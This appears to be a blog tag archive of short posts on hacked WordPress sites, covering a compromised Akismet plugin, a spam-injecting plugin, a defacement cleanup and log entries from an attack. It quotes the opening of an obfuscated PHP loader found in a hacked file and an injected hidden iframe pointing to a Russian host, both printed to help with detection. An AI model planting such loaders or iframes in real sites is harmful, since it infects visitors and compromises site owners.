Tag Archives: hack

Akismet Hacked

If your WordPress site has been compromised, try checking out your Akismet plugin. It’s so commonly used that its often subject to attacks. If any of these files are showing up in your plugins folder, you may be the subject of an attack: .akismet.cache.php .akismet.bak.php .akismet.old.php class-akismet.php db-akismet.php One akismet.php file that I found started out something like this: <?php if (!function_exists(“TC9A16C47DA8EEE87”)) { function TC9A16C47DA8EEE87($T059EC46CFE335260) { $T059EC46CFE335260 = base64_decode($T059EC46CFE335260); $TC9A16C47DA8EEE87 = 0; $TA7FB8B0A1C0E2E9E = 0; $T17D35BB9DF7A47E4 = 0; $T65CE9F6823D588A7 = (ord($T059EC46CFE335260[1]) << 8) + ord($T059EC46CFE335260[2]); $TBF14159DC7D007D3 = 3; $T77605D5F26DD5248 = 0; $T4A747C3263CA7A55 = 16; $T7C7E72B89B83E235 = “”; $T0D47BDF6FD9DDE2E = strlen($T059EC46CFE335260); $T43D5686285035C13 = __FILE__; $T43D5686285035C13 = file_get_contents($T43D5686285035C13); $T6BBC58A3B5B11DC4 = 0; preg_match(base64_decode(“LyhwcmludHxzcHJpbnR8ZWNobykv”), $T43D5686285035C13, $T6BBC58A3B5B11DC4); for (;$TBF14159DC7D007D3 < $T0D47BDF6FD9DDE2E;) { if (count($T6BBC58A3B5B11DC4)) exit; if ($T4A747C3263CA7A55 == 0) { $T65CE9F6823D588A7 = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 8); $T65CE9F6823D588A7+= ord($T059EC46CFE335260[$TBF14159DC7D007D3++]); $T4A747C3263CA7A55 = 16; } if ($T65CE9F6823D588A7 & 0x8000) { $TC9A16C47DA8EEE87 = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 4); $TC9A16C47DA8EEE87+= (ord($T059EC46CFE335260[$TBF14159DC7D007D3]) >> 4); if ($TC9A16C47DA8EEE87) { $TA7FB8B0A1C0E2E9E = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) & 0x0F) + 3; for ($T17D35BB9DF7A47E4 = 0;$T17D35BB9DF7A47E4 < $TA7FB8B0A1C0E2E9E;$T17D35BB9DF7A47E4++) $T7C7E72B89B83E235[$T77605D5F26DD5248 + $T17D35BB9DF7A47E4] = $T7C7E72B89B83E235[$T77605D5F26DD5248 – $TC9A16C47DA8EEE87 + $T17D35BB9DF7A47E4]; $T77605D5F26DD5248+= $TA7FB8B0A1C0E2E9E; } else { $TA7FB8B0A1C0E2E9E = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 8); $TA7FB8B0A1C0E2E9E+= ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) + 16; for ($T17D35BB9DF7A47E4 = 0;$T17D35BB9DF7A47E4 < $TA7FB8B0A1C0E2E9E;$T7C7E72B89B83E235[$T77605D5F26DD5248 + $T17D35BB9DF7A47E4++] = $T059EC46CFE335260[$TBF14159DC7D007D3]); $TBF14159DC7D007D3++; $T77605D5F26DD5248+= $TA7FB8B0A1C0E2E9E; } } else $T7C7E72B89B83E235[$T77605D5F26DD5248++] = $T059EC46CFE335260[$TBF14159DC7D007D3++]; $T65CE9F6823D588A7 <<= 1; $T4A747C3263CA7A55–; if ($TBF14159DC7D007D3 == $T0D47BDF6FD9DDE2E) { $T43D5686285035C13 = implode(“”, $T7C7E72B89B83E235); $T43D5686285035C13 = “?” . “>” . $T43D5686285035C13; return $T43D5686285035C13; } } } }; ?> If you want the PHP code, which is obfuscated, for the akismet.php file I came … Continue reading

Posted in Security, Web Development | Tagged , , , | 1 Comment

Accutane WordPress Hack

If your wordpress site is showing “Buy Accutane Online” in the Google Results, it’s because one of the plugins you’re using is not safe. One plugin know for this exploit is the “My Page Order” plugin by geekyweekly. I’d suggest removing the plugin all together. You’ll notice that the source code is clean, if you view it, as the plugin only affects the page when the Google bot is viewing it. The function is using two strings of binary character values: $unique_id = “\x62\x61s\x65\x36\x34\x5f\x64\x65c\x6f\x64\x65” $unique_hash = “\x63\x72e\x61\x74\x65\x5f\x66\x75\x6ec\x74\x69\x6f\x6e” Those translate into base64_decode and create_function respectively, which are two functions you don’t want to see in any plugin or theme, they are usually responsible for maladies. You should also check your server logs for “wxdGrgPB” as that is the post/get variable used to send malicious commands to this script.

Posted in Tech Tips, Web Development | Tagged , | Leave a comment

Fix “pakcyberarmy.net” Website Hack

If you are seeing this code, your website has been hacked: ~ Call 911 y0u g0t Hacked by Pak Cyber Army ~ <=Shak=> ~ If your website has been hacked and the pakcyberarmy.net spam is showing up, this is how you can fix it: This exploit usually only affects the root index file, perhaps that is index.html or index.php. Restore this file to a saved, earlier version, or rename it to something like index.txt or index.bak if you need to start from scratch. You may also want to look at the file-modification time to see when the file was last modified to get some idea of when the attack occurred. You should check the server logs and look for suspicious FTP activity, or unusually HTTP requests, especially ones with GET parameters or POST data. You should also check your .htaccess file for rewrite rules which will be redirecting visitors. If you have shell access run this command to see all files changes within the last 24 hours: find ~ -mtime -24 You can change ~ to ~/www or the path to your web root as needed.

Posted in Tech Tips, Web Development | Tagged , | Leave a comment


I’m getting errors in my log file with “sadeferxaa” in the url request: IP: Page Requested: /index.php?page=sadeferxaa Browser Signature: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90) WordPress was also compromised with the following data injected at the end of some files: <html><body><iframe src=”http://eftpsid0342943.ru/contacts/s3″ width=1 height=1></iframe></body></html> I’m trying to track down the source of the compromise, please comment if you have a similar experience with this.

Posted in Tech Tips | Tagged | 3 Comments